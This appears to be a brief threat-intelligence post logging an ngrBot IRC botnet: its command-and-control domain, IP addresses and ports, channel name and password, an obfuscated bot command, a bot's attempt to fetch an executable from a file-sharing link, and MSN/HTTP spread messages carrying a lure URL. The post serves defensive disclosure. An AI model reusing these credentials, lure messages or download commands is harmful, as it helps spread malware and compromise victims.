abc.radiozeri.de(irc botnet hosted in Taiwan Taipei Taiwan Fixed Network Co. Ltd)

Dns resolved abc.radiozeri.de to 61.31.99.67

ircd:
61.31.99.67:81

chanel:
#sos#

* Now talking in #sos#
* Topic is ”
* Set by mofo on Mon Apr 25 14:58:51

.s /99/106/112/81/55/59/40/104/113/121/35/102/121/51/113/98/117/109/126/122/102/124/38/86/75/119/107/117/121/58/43/62/48/55/51/16/48/50/
mx (r00t@bossman) Quit (Ping timeout)

UPDATE:
Remote Host Port Number
195.122.131.7 80
213.251.170.52 80
59.76.142.100 4042 PASS ngrBot

JOIN #US
JOIN #new
PRIVMSG #boss :[d=”http://rapidshare.com/files/460738009/sos.exe”] Error downloading file [e=”12039″]
NICK n{US|XPa}ytveddy
USER ytveddy 0 0 :ytveddy
JOIN #boss ngrBot
PRIVMSG #boss :[MSN]: Updated MSN spread interval to “6”
PRIVMSG #boss :[MSN]: Updated MSN spread message to “wow hahaha!! http://is.gd/05_05_photos?=www.facebook.com”
PRIVMSG #boss :[HTTP]: Updated HTTP spread interval to “6”
PRIVMSG #boss :[HTTP]: Updated HTTP spread message to “wow hahaha!! http://is.gd/05_05_photos?=www.facebook.com”

infos about hosting:
http://whois.domaintools.com/61.31.99.67
http://whois.domaintools.com/59.76.142.100

Categories: Uncategorized